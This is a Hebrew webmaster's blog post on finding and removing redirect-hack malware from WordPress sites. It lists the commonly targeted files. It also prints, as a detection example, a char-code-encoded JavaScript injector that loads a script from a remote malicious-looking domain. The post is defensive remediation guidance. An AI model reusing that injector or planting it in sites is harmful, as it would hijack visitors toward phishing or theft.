fbpx
ניהול אתרים, תחזוקת אתרים

טיפול בפריצה לאתר! – איך מטפלים בפריצת "הפניה" באתר אינטרנט?

Posted on by ישראל בוכוולד

בעלי אתרי אינטרנט רבים נמצאים מידי יום באתר. הם מוסיפים תכנים/מוצרים, מעדכנים מלאים ומחירים ובכללי בטוחים שהם רואים הכל. למרות האמור, מרבית הפריצות לאתרים מתגלים דווקא על ידי גולשים באתר שמעדכנים את בעל האתר בכך שיש בעיה בזמן אמת. כאשר הגולשים חווים את זה, זה כבר גורר הפסדים כספיים.

תוכן עניינים: הצג

במאמר זה, אנו לא נתייחס לאופן שבו מונעים פריצה מלכתחילה (מאמר על כך ניתן לקרוא בקישור זה) אלא איך מצמצמים את הנזק למינימום האפשרי על ידי טיפול מהיר ומידי בבעיה. במאמר זה נתייחס לפריצה הפופולרית ביותר כיום והיא זו ש"גונבת" לנו לקוחות ומעבירה אותם לאתרים מפוקפקים אחרים..

יש לך שאלה? התייעצ/י איתנו, נשמח לעזור!

    פריצת הפניה באתר וורדפרס

    פריצת הפניה (Redirect Hack) הנה פריצה שלא ממש רואים אותה, מדובר בפריצה שקטה אשר מתרחשת מאחורי הקלעים ולא ניתנת לזיהוי מהיר בצד המשתמש ואו בצד המערכת. פריצה זו אינה גורמת נזק לקוד האתר אלא רק מוסיפה שורות קוד נוספות (הזרקה חיצונית של קוד) אשר מטרתן לגנוב את לקוחות האתר בנקודות שונות במשפך המכירתי.

    פריצת הפניה הנה הפריצה הפופולרית ביותר בעולם מכמה סיבות:

    1. מדובר בפריצה פשוטה למדי.
    2. מדובר בפריצה יעילה למדי.
    3. מדובר בפריצה שפועלת זמן רב.

    האקרים בעצם יוצרים בוט, הבוט מחפש אתרים בהם פועלים תוספים ואו תבניות המכילות "כניסה אחורית" ואו קוד פגום. עם איתור אתר בו תנאים אלו מתקיימים, הבוט יזריק באופן עצמאי שורות קוד מקודדות ושורות אלו בעצם יגרמו לביצוע ההפניות המתסכלות שכולם סובלים.

    זיהו פריצת הפניה לאתר

    יש כמה סוגי פריצות הפניה באתרי וורדפרס, חלקם בולטים, אחרים יכולים לעבור מתחת לרדאר לתקופה ארוכה,

    • הפניה של גולשים לאחר לחיצה כלשהי באתר.
    • הפניה של גולשים עם מעבר לסל הקניות.
    • הפניה של גולשים רק במכשירי מוביייל.
    • וכן הלאה..

    כלל הפריצות הללו פועלים בצורה דומה להפליא אך התוקפים מגוונים את הטריגרים (המחוללים) של פעולת ההפניה בכדי לבדוק מי מהם מייצר עבורם ערך גבוהה יותר לאורך זמן. כך לדוגמה, הפניה שמתקיימת רק לאחר שמשתמש הוסיף לסל ולחץ על כניסה לסל קניות עלולה להקטין את מספר ההפניות, אך הפניות אלו יהיו מאוד איכותיות לאלו הרוצים לגנוב מידע/כרטיסי אשראי (פישינג) ואו לזהות לקוחות שרוכשים בתכיפות גבוהה.

    כדי לזהות פריצה זו, מומלץ לקבוע ביומן אחת לשבוע מעבר מסודר על האתר במחשב וגם בסלולרי ובו לדמות משתמש. כך, אם יש פריצת הפניה באתר, אתם תדעו על כך בתוך פרק זמן סביר ולא לאחר היווצרות נזק משמעותי למותג ולאתר.

    איך מאתרים את הקוד הזדוני שהושתל באתר?

    כדי שהאתר שלכם יפנה גולשים למקור חיצוני, על התוקף להזריק קוד זדוני לנקודות בעלות ערך מסוג זה. כלומר, ישנם צמתים שונים במערכת של האתר בהם הרגישות להזרקת קוד גבוהה למדי, להלן הנתיבים המועדפים על תוקפנים אלו:

    • קבצים זמניים עד להעלאת האתר לאוויר: domain.com>public_html>Default.html
      כמו גם: index.php | wp-config.php | wp-settings.php | wp-load.php | .htaccess
    • קבצי ליבה של תבנית האתר: domain.com>public_html>wp-content>theme>functions.php
      כמו גם: header.php | footer.php
    • תוספים פיקטיביים: domain.com>public_html>wp-content>plugins>new-plugin-file/folder

    במרבית המקרים, יהיו כמה הזרקות, ועלינו לעבור ולבדוק שלא נוספו קבצים לא קשורים לתיקיית התוספים ואו תוספים חדשים שלא מוכרים לנו כמו גם לבדוק היטב את קבצי התבנית בדגש על קובץ הפונקציות ואו ההאדר של התבנית כי משם הדרך להפניה קצרה במיוחד.

    איך מזהים את הקוד הזדוני שהושתל באתר?

    זיהוי קוד זדוני נעשה בכמה רמות:

    1. על ידי סריקת קבצי האתר לזיהוי שינויים מקוד המקור של וורדפרס.
    2. על ידי סריקה אנושית של הקבצים שצוינו מעלה אחד אחד.

    בזיהוי האנושי, אנו נרצה לחפש קוד שלא נראה תקין. לרוב קוד של פריצה יכלול קוד לא קריא כלל. מדובר בעצם בקוד זדוני מוצפן (הם רוצים שלא תדעו לאן מפנה שלא תוכלו לחפש במדויק בקוד ולהסיר בקלות, זה יראה בערך כך:

    23,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,10,32,32,32,32,112,111,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118,97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32,32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44,32,115,41,59,10,32,32,125,41,40,41,59

    קוד מסוג זה לא אמור להופיע במערכת שלכם למעט בתוספי פרימיום מאוד יקרים לצורכי ממשוק מערכות ואו אבטחה מתקדמת. לכן, הופעת קוד זה בקבצי מערכת, תבנית ואו תוספים סטנדרטיים לגמרי מדליקה לנו אורות אדומים!. כלומר, אם עוברים קובץ קובץ, קל גם לאדם הפשוט לאתר ולהסיר את הקוד הזדוני אך זה ידרוש סבלנות רבה אם לא יודעים איפה לחפש..

    מחיקת קוד זדוני מהאתר

    עם זיהוי הקוד הזדוני באתר, עלינו למחוק את הקוד, אבל – רגע לפני שמוחקים, חשוב מאוד להוריד את הקובץ הנגוע למחשב ואו להעתיק את התוכן שלו לגיבוי בקובץ פתוח. רק לאחר שגיבינו הכל, ננסה למחוק את הקוד הזדוני בלי להשאיר כלום,

    לאחר מכן, מומלץ להיכנס לאתר בנסתר ולבדוק האם הבעיה נפתרה או שיש להמשיך לחפש עוד קודים זדוניים נוספים 🙂

    בהצלחה!

    ישראל בוכוולד

    מנהל אתרים (webmaster) הנו בעל מקצוע שידע להתמודד עם כל בעיה ולהציע לכם פתרונות שונים בניהול השוטף והמידי של האתר אינטרנט שלכם! לקבלת שירותי ניהול אתר, הרגישו חופשי לפנות אלינו בעמוד יצירת הקשר באתר.

    כתיבת תגובה

    האימייל לא יוצג באתר. שדות החובה מסומנים *

    התייעץ איתנו חינם!
    1
    צריך עזרה?
    שלום,
    איך אפשר לעזור לך היום?
    לחצ/י להתייעצות חינם! דילוג לתוכן